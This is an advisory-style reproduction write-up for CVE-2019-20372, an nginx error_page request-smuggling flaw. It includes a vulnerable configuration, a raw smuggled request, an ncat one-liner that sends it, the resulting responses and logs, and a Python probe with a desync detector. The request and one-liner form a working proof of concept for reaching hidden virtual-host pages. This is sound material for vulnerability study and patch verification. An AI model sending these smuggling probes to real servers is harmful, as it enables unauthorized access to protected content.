CVE-2019-20372: Nginx error_page request smuggling
1. Vulnerability overview
Nginx versions before 1.17.7 have a security flaw in error_page handling. An attacker can exploit it to read unauthorized web pages.
2. Affected versions
Nginx < 1.17.7
3. Reproduction
Vulnerable configuration
server {
    listen 80;
    server_name localhost;
    error_page 401 http://example.org;
    location / {
        return 401;
    }
}

server {
    listen 80;
    server_name notlocalhost;
    location /_hidden/index.html {
        return 200 'This should be hidden!';
    }
}
At this point we can send the following request to the server (the Content-Length of 56 is exactly the size of the second request carried in the body):

GET /a HTTP/1.1
Host: localhost
Content-Length: 56

GET /_hidden/index.html HTTP/1.1
Host: notlocalhost

Let's see how the server handles it:

printf "GET /a HTTP/1.1\r\nHost: localhost\r\nContent-Length: 56\r\n\r\nGET /_hidden/index.html HTTP/1.1\r\nHost: notlocalhost\r\n\r\n" | ncat localhost 80 --no-shutdown
In effect, nginx processed the body of the first request as a second request, so both requests were executed indirectly. Here are the responses as shown in Burp:

HTTP/1.1 302 Moved Temporarily
Server: nginx/1.17.6
Date: Fri, 06 Dec 2019 18:23:33 GMT
Content-Type: text/html
Content-Length: 145
Connection: keep-alive
Location: http://example.org

(body: the default nginx "302 Found" HTML page, footer nginx/1.17.6)

HTTP/1.1 200 OK
Server: nginx/1.17.6
Date: Fri, 06 Dec 2019 18:23:33 GMT
Content-Type: text/html
Content-Length: 22
Connection: keep-alive

This should be hidden!
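To verify the behaviour above (for example after upgrading to 1.17.7, to confirm the fix is in place) without Burp, here is an added Python example that is not part of the original write-up. It builds the same probe, deriving Content-Length from the embedded request so that the value 56 is computed rather than hand-counted, and it splits a raw byte stream into HTTP responses using Content-Length framing: a correctly framed server answers the probe once, a server that reads the body as a second request answers twice. The sample response stream is constructed to mirror the two responses shown above (the 302 body is a shortened stand-in, not the real 145-byte page); send_probe and its host/port parameters are assumptions for a live check against your own server and are not exercised here.

```python
import re
import socket

# The request carried in the body of the outer request (from the write-up).
SMUGGLED = b"GET /_hidden/index.html HTTP/1.1\r\nHost: notlocalhost\r\n\r\n"


def build_probe(outer_host: bytes = b"localhost", inner: bytes = SMUGGLED) -> bytes:
    """Outer request whose Content-Length equals the size of the inner request,
    so the body is exactly one complete HTTP request (56 bytes for SMUGGLED)."""
    return (
        b"GET /a HTTP/1.1\r\n"
        + b"Host: " + outer_host + b"\r\n"
        + b"Content-Length: " + str(len(inner)).encode() + b"\r\n\r\n"
        + inner
    )


def split_responses(stream: bytes) -> list:
    """Split a raw byte stream into (status, headers, body) tuples using
    Content-Length framing. Stops at the first incomplete or non-HTTP chunk."""
    responses = []
    pos = 0
    while True:
        end = stream.find(b"\r\n\r\n", pos)
        if end == -1:
            break
        lines = stream[pos:end].decode("latin-1").split("\r\n")
        m = re.match(r"HTTP/1\.[01] (\d{3})", lines[0])
        if not m:
            break
        headers = {}
        for line in lines[1:]:
            name, _, value = line.partition(":")
            headers[name.strip().lower()] = value.strip()
        length = int(headers.get("content-length", "0"))
        body_start = end + 4
        body = stream[body_start:body_start + length]
        if len(body) < length:
            break  # truncated response; do not count it
        responses.append((int(m.group(1)), headers, body))
        pos = body_start + length
    return responses


def desync_detected(stream: bytes) -> bool:
    """True when one probe produced more than one response on the connection."""
    return len(split_responses(stream)) > 1


def send_probe(host: str = "localhost", port: int = 80, timeout: float = 3.0) -> bytes:
    """Live check (assumed host/port): send the probe on a single connection and
    collect everything returned until the server closes or the timeout expires."""
    with socket.create_connection((host, port), timeout=timeout) as s:
        s.sendall(build_probe())
        chunks = []
        try:
            while True:
                data = s.recv(4096)
                if not data:
                    break
                chunks.append(data)
        except socket.timeout:
            pass
    return b"".join(chunks)


def _response(first_lines: bytes, body: bytes) -> bytes:
    """Constructed nginx-style response with a correct Content-Length."""
    return (
        first_lines + b"\r\nServer: nginx/1.17.6\r\nContent-Type: text/html\r\n"
        + b"Content-Length: " + str(len(body)).encode() + b"\r\n"
        + b"Connection: keep-alive\r\n\r\n" + body
    )


# Constructed sample stream mirroring the two responses in the write-up.
FIRST_RESPONSE = _response(
    b"HTTP/1.1 302 Moved Temporarily\r\nLocation: http://example.org",
    b"<h1>302 Found</h1>",
)
SECOND_RESPONSE = _response(b"HTTP/1.1 200 OK", b"This should be hidden!")
VULNERABLE_STREAM = FIRST_RESPONSE + SECOND_RESPONSE

if __name__ == "__main__":
    for status, hdrs, body in split_responses(VULNERABLE_STREAM):
        print(status, hdrs.get("location", ""), body)
    print("desync:", desync_detected(VULNERABLE_STREAM))
```

Against the sample stream the splitter returns the 302 and then the 200 carrying "This should be hidden!", and desync_detected reports True; a stream containing only the 302 yields a single response and False, which is what a patched server should produce for the same probe.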
Now look at the nginx server log:

172.17.0.1 - - [06/Dec/2019:18:23:33 +0000] "GET /a HTTP/1.1" 302 145 "-" "-" "-"
172.17.0.1 - - [06/Dec/2019:18:23:33 +0000] "GET /_hidden/index.html HTTP/1.1" 200 22 "-"